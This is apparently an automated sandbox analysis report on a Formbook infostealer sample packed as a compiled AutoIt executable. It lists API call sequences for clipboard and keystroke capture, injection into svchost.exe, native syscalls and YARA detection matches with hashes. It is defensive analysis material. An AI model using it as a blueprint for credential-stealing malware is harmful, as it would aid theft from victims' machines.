            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AF6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00AF6B0C
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AF6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00AF6D07
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AF6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00AF6B0C
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AE2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00AE2B37
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00B0F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B0F7FF

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3382319545.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2547555500.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3377564607.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2558893613.0000000007FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3377429665.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2548261578.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3378789230.0000000003970000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3377223232.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3382319545.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2547555500.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3377564607.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2558893613.0000000007FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3377429665.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2548261578.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3378789230.0000000003970000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3377223232.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: This is a third-party compiled AutoIt script.0_2_00AA3D19
            Source: MGQeZjDXc3.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: MGQeZjDXc3.exe, 00000000.00000000.2119356748.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_17b30f62-6
            Source: MGQeZjDXc3.exe, 00000000.00000000.2119356748.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_62237ef8-e
            Source: MGQeZjDXc3.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_196d418b-1
            Source: MGQeZjDXc3.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ac5d03f6-5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C0F3 NtClose,2_2_0042C0F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B60 NtClose,LdrInitializeThunk,2_2_03272B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03272DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03272C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk,2_2_032735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274340 NtSetContextThread,2_2_03274340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274650 NtSuspendThread,2_2_03274650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BA0 NtEnumerateValueKey,2_2_03272BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B80 NtQueryInformationFile,2_2_03272B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BE0 NtQueryValueKey,2_2_03272BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BF0 NtAllocateVirtualMemory,2_2_03272BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AB0 NtWaitForSingleObject,2_2_03272AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AF0 NtWriteFile,2_2_03272AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AD0 NtReadFile,2_2_03272AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F30 NtCreateSection,2_2_03272F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F60 NtCreateProcessEx,2_2_03272F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FA0 NtQuerySection,2_2_03272FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FB0 NtResumeThread,2_2_03272FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F90 NtProtectVirtualMemory,2_2_03272F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FE0 NtCreateFile,2_2_03272FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E30 NtWriteVirtualMemory,2_2_03272E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EA0 NtAdjustPrivilegesToken,2_2_03272EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E80 NtReadVirtualMemory,2_2_03272E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EE0 NtQueueApcThread,2_2_03272EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D30 NtUnmapViewOfSection,2_2_03272D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D00 NtSetInformationFile,2_2_03272D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D10 NtMapViewOfSection,2_2_03272D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DB0 NtEnumerateKey,2_2_03272DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DD0 NtDelayExecution,2_2_03272DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C00 NtQueryInformationProcess,2_2_03272C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C60 NtCreateKey,2_2_03272C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CA0 NtQueryInformationToken,2_2_03272CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CF0 NtOpenProcess,2_2_03272CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CC0 NtQueryVirtualMemory,2_2_03272CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273010 NtOpenDirectoryObject,2_2_03273010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273090 NtSetValueKey,2_2_03273090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032739B0 NtGetContextThread,2_2_032739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D10 NtOpenProcessToken,2_2_03273D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D70 NtOpenThread,2_2_03273D70
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AE6685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00AE6685
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ADACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00ADACC5
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AE79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00AE79D3
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AAE3B00_2_00AAE3B0
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ACB0430_2_00ACB043
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AB32000_2_00AB3200
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AB3B700_2_00AB3B70
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AD410F0_2_00AD410F
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AC02A40_2_00AC02A4
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AD038E0_2_00AD038E
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AC06D90_2_00AC06D9
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AD467F0_2_00AD467F
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00B0AACE0_2_00B0AACE
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AD4BEF0_2_00AD4BEF
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ACCCC10_2_00ACCCC1
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AA6F070_2_00AA6F07
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AAAF500_2_00AAAF50
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00B031BC0_2_00B031BC
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ACD1B90_2_00ACD1B9
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ABB11F0_2_00ABB11F
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AC123A0_2_00AC123A
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AD724D0_2_00AD724D
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AA93F00_2_00AA93F0
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AE13CA0_2_00AE13CA
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ABF5630_2_00ABF563
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AEB6CC0_2_00AEB6CC
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AA96C00_2_00AA96C0
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AA77B00_2_00AA77B0
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00B0F7FF0_2_00B0F7FF
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AD79C90_2_00AD79C9
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ABFA570_2_00ABFA57
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AA9B600_2_00AA9B60
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AA7D190_2_00AA7D19
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AC9ED00_2_00AC9ED0
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ABFE6F0_2_00ABFE6F
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AA7FA30_2_00AA7FA3
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_0133A8280_2_0133A828
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004181432_2_00418143
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030402_2_00403040
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010F02_2_004010F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004021DD2_2_004021DD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004021E02_2_004021E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9AA2_2_0040F9AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9B32_2_0040F9B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012602_2_00401260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004163232_2_00416323
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FBD32_2_0040FBD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DBF42_2_0040DBF4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040238C2_2_0040238C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023902_2_00402390
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DC532_2_0040DC53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026C02_2_004026C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E7232_2_0042E723
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA3522_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F02_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033003E62_2_033003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E02742_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C02C02_2_032C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032301002_2_03230100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA1182_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C81582_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033001AA2_2_033001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F81CC2_2_032F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D20002_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032407702_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032647502_2_03264750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C02_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C6E02_2_0325C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032405352_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033005912_2_03300591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E44202_2_032E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F24462_2_032F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EE4F62_2_032EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB402_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F6BD72_2_032F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA802_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032569622_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A02_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330A9A62_2_0330A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324A8402_2_0324A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032428402_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032268B82_2_032268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E8F02_2_0326E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03282F282_2_03282F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260F302_2_03260F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E2F302_2_032E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4F402_2_032B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BEFA02_2_032BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324CFE02_2_0324CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232FC82_2_03232FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEE262_2_032FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240E592_2_03240E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252E902_2_03252E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FCE932_2_032FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEEDB2_2_032FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324AD002_2_0324AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DCD1F2_2_032DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03258DBF2_2_03258DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323ADE02_2_0323ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240C002_2_03240C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0CB52_2_032E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230CF22_2_03230CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F132D2_2_032F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D34C2_2_0322D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0328739A2_2_0328739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032452A02_2_032452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED2_2_032E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B2C02_2_0325B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327516C2_2_0327516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F1722_2_0322F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B16B2_2_0330B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324B1B02_2_0324B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F70E92_2_032F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF0E02_2_032FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF0CC2_2_032EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C02_2_032470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF7B02_2_032FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F16CC2_2_032F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F75712_2_032F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DD5B02_2_032DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF43F2_2_032FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032314602_2_03231460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFB762_2_032FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FB802_2_0325FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B5BF02_2_032B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327DBF92_2_0327DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B3A6C2_2_032B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFA492_2_032FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F7A462_2_032F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DDAAC2_2_032DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03285AA02_2_03285AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E1AA32_2_032E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EDAC62_2_032EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D59102_2_032D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032499502_2_03249950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B9502_2_0325B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD8002_2_032AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032438E02_2_032438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFF092_2_032FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFFB12_2_032FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241F922_2_03241F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03249EB02_2_03249EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F7D732_2_032F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243D402_2_03243D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F1D5A2_2_032F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FDC02_2_0325FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B9C322_2_032B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFCF22_2_032FFCF2
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: String function: 00ABEC2F appears 68 times
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: String function: 00AC6AC0 appears 42 times
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: String function: 00ACF8A0 appears 35 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 102 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 105 times
            Source: MGQeZjDXc3.exe, 00000000.00000003.2141501046.000000000402D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MGQeZjDXc3.exe
            Source: MGQeZjDXc3.exe, 00000000.00000003.2143260846.0000000003ED3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MGQeZjDXc3.exe
            Source: MGQeZjDXc3.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3382319545.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
